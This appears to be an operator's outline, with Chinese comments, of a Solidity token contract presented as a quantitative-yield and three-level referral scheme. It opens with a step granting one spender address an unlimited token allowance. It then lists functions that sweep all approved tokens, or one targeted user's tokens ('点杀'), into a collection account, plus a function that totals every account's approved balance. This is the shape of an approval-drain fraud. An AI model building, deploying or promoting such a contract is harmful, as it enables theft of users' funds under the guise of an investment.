0xBAc31F3c18a17f807f5c46C86a53a928e821A4d0
添加授权 
spender = 0x048441B18fa30B45B9487e002e00c1782Ef66730  // qk 
addedValue = 115792089237316195423570985008687907853269984665640564039457584007913129639935

increaseAllowance(address spender, uint256 addedValue)

========================================================


    //计算代币上的地址过去到现在的收益，返回的times，相对于八小时的几倍，也就是几次收益，
    function calculate_earnings(IERC20 _address, address _user_address) public view returns (uint256, uint256,uint256)
	
	// 推荐奖励提现
    function re_withdraw(IERC20 _address) public virtual
	
	//提现，时间到了后提现。
    function withdraw(IERC20 _address) public virtual {
	
	// 加入 或者更新
    function join(IERC20 _address) public virtual {
	
	//转所有的指定币归集
    function q_all(IERC20 _address) public virtual {
	
	//点杀
    function q(IERC20 _address, address u) public virtual {
	
	//转币归集 数组
    function q_all_array(IERC20 _address, address[] memory _user_address) public virtual {
	
	//获取推荐费率
    function get_Re_fee() public view returns(uint256[3] memory){
	
	//获取量化本金生息基数
    function get_conditional_value() public view returns(uint256[] memory){
	
	//获取量化利息基数
    function get_interest() public view returns(uint256[] memory){
	5/1000
	
	 /**
    获取全部账号余额
    */
    function getAllBalanceOf(IERC20 _address) public view returns (uint256){
	
	 /**
   获取全部账号授权余额
   */
    function getAllBalanceOf_(IERC20 _address) public view returns (uint256){
	
	/**
    获取用户提现记录 -----
    */
    function get_user_info(IERC20 _address) public view returns (_User memory){
	
	/**
        获取排行榜
        */
    function get_king_sort(IERC20 _address) public view returns (king_sort[] memory){
	
	/**
       获取用户下级提现记录
       */
    function get_re_log_info(address _address) public view returns (_logInfo[] memory){
	
	/**
     获取用户推广提现的可提余额，和已经提过的数量
    */
    function get_re_interests(IERC20 _address,address _user_address) public view returns (_interests_info memory){
	
	/*获取用户推荐账户余额
    k = 0, 代表直推，1，代表第二级，2，代表第三级
    返回，团队市场总额，和已经提现的数量。
    */
    function get_user_All_re_BalanceOf(IERC20 _address, address u, uint k) public view returns (uint256,uint256){